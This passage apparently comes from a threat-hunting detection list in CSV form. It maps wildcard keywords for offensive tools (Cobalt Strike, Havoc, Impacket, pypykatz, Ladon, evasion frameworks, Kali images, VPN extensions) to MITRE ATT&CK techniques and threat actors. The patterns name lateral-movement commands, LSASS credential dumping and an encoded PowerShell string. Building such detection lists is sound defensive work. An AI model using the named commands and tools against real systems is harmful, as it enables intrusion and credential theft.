+"*jump psexec64*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*jump winrm *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 -
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*jump winrm*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera -
APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*jump-exec scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks.
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*jweny/zabbix-saml-bypass-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" +"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. 
scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4465","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" +"*-K lsass_loot*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-k -no-pass -p '' --auth-method kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*k4yt3x/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*K8_CS_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*k8gege.org/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*k8gege/Ladon*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*K8Ladon.sln*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 
+"*kali-*.deb*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-anonsurf*","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","N/A","N/A","10","1268","427","2023-05-18T00:25:57Z","2015-08-19T04:57:16Z" +"*KaliLadon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*kali-linux*.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux*.img*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux*.iso*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmdk*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmwarevm*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmx*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-installer-amd64.iso*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-installer-everything-amd64.iso.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-live-everything-amd64.iso.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-raspberry-pi-armhf.img.xz*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-virtualbox-amd64.ova*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-vmware-amd64.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). 
or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","898","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" +"*kaluche/bloodhound-quickwin*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*kancotdiq/wpaf*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" +"*karendm/ADHunt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*katoolin*toollist.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*katoolin3.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*KatzSystemArchitecture*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*KBDPAYLOAD.dll*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" +"*kcdahmgmaagjhocpipbodaokikjkampi*","greyware_tool_keyword","Hola VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*kchocjcihdgkoplngjemhpplmmloanja*","greyware_tool_keyword","IPBurger Proxy & VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*kcndmbbelllkmioekdagahekgimemejo*","greyware_tool_keyword","VPN.AC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
